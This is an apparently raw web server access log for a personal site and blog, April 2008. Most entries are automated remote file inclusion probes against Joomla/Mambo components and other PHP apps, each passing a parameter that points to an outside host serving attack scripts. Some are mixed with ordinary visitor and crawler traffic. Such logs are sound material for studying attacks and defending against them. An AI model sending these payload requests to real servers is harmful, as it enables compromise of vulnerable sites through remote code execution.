87.106.129.86 - - [17/Apr/2008:12:39:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.systel.ru/phpbb2//language/lang_german/mail.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:40:22 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.151.85.156 - - [17/Apr/2008:12:40:44 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.168.112.1 - - [17/Apr/2008:12:41:01 -0700] "GET /logs/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.168.112.1 - - [17/Apr/2008:12:41:02 -0700] "GET /index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
222.255.3.68 - - [17/Apr/2008:12:41:20 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://199k.info/krix/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.148.95.133 - - [17/Apr/2008:12:42:04 -0700] "GET /logs/access_080223.log/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.133 - - [17/Apr/2008:12:42:04 -0700] "GET /status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.133 - - [17/Apr/2008:12:42:05 -0700] "GET /logs/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:39 -0700] "GET / HTTP/1.1" 200 11606 "http://www.st-owners.com/forums/showthread.php?p=430478" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:39 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:40 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:43 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:48 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:49 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:53 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:57 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:59 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 3211264 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:59 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 2097152 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "www.dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:59 -0700] "GET /blog/wp-content/themes/default/images/kubrickbg.jpg HTTP/1.1" 200 1043 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
63.206.47.131 - - [17/Apr/2008:12:42:59 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "dmulk.com"
70.87.240.50 - - [17/Apr/2008:12:44:01 -0700] "GET /logs/access_080225.log/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.87.240.50 - - [17/Apr/2008:12:44:02 -0700] "GET /logs/access_080225.log/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:44:10 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:44:11 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:44:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
121.1.135.201 - - [17/Apr/2008:12:45:17 -0700] "GET /logs/access_080225.log/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:12:45:17 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:12:45:17 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:12:45:18 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:46:27 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.27.58 - - [17/Apr/2008:12:46:37 -0700] "GET /presto/?D=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.45 - - [17/Apr/2008:12:47:09 -0700] "GET /tmp/?S=A HTTP/1.0" 200 2164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:12:47:15 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.155.227.84 - - [17/Apr/2008:12:49:23 -0700] "GET /logs/access_080221.log//display.php?page=&lang=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.184 - - [17/Apr/2008:12:49:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.24.44 - - [17/Apr/2008:12:49:51 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 7172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
217.148.95.133 - - [17/Apr/2008:12:49:52 -0700] "GET /logs/access_080225.log/status//administrator/components/com_serverstat/install.serverstat.php?*=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.177.16.181 - - [17/Apr/2008:12:50:23 -0700] "GET /logs/access_080226.log//zipndownload.php?PP_PATH=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [17/Apr/2008:12:50:24 -0700] "GET //zipndownload.php?PP_PATH=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [17/Apr/2008:12:50:25 -0700] "GET /logs//zipndownload.php?PP_PATH=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [17/Apr/2008:12:50:35 -0700] "GET /logs/access_080131.log//zipndownload.php?PP_PATH=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:52:07 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:52:07 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:52:08 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:52:21 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:52:21 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:52:22 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:52:43 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:53:22 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:53:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:54:00 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:54:12 -0700] "GET /logs/access_080211.log/skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:54:12 -0700] "GET /skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:54:13 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:54:20 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:54:20 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.6.17.183 - - [17/Apr/2008:12:54:31 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.21.219 - - [17/Apr/2008:12:54:34 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 7172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
212.69.204.75 - - [17/Apr/2008:12:54:41 -0700] "GET /index.php?pag=http://www.backbreakacres.com/22/test.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
216.32.94.50 - - [17/Apr/2008:12:54:44 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://mariosilva.freehostia.com/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [17/Apr/2008:12:54:46 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://mariosilva.freehostia.com/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [17/Apr/2008:12:54:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://mariosilva.freehostia.com/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:54:53 -0700] "GET /logs/access_080324.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:54:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:54:54 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
72.29.90.83 - - [17/Apr/2008:12:54:58 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.systel.ru/phpbb2//language/lang_german/list.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.90.83 - - [17/Apr/2008:12:55:01 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.systel.ru/phpbb2//language/lang_german/list.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:55:03 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:55:22 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:55:22 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:55:22 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:55:23 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:55:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:12:55:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.215.80.102 - - [17/Apr/2008:12:55:46 -0700] "GET /logs/access_080123.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.166.217.184 - - [17/Apr/2008:12:56:06 -0700] "GET /index1.php?site=http://www.systel.ru/phpbb2//language/lang_german/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
210.166.217.184 - - [17/Apr/2008:12:56:06 -0700] "GET /logs/index1.php?site=http://www.systel.ru/phpbb2//language/lang_german/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
63.247.139.40 - - [17/Apr/2008:12:56:26 -0700] "GET /index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
80.93.56.80 - - [17/Apr/2008:12:57:10 -0700] "GET /logs/access_080308.log/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/finkel/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [17/Apr/2008:12:57:11 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/finkel/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [17/Apr/2008:12:57:11 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/finkel/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:57:16 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:57:16 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:57:18 -0700] "GET /logs/access_080219.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:57:21 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:57:22 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:12:58:11 -0700] "GET /logs/access_080324.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:12:58:11 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:12:58:12 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:12:58:31 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:59:25 -0700] "GET /logs/access.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:59:29 -0700] "GET /logs/access_080120.log/skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:59:30 -0700] "GET /skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:12:59:30 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:59:34 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:59:34 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:00:25 -0700] "GET /logs//config.inc.php?config%5broot_dir%5d=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:00:25 -0700] "GET //config.inc.php?config%5broot_dir%5d=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:00:34 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:00:34 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:01:49 -0700] "GET /logs/access_080324.log/skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
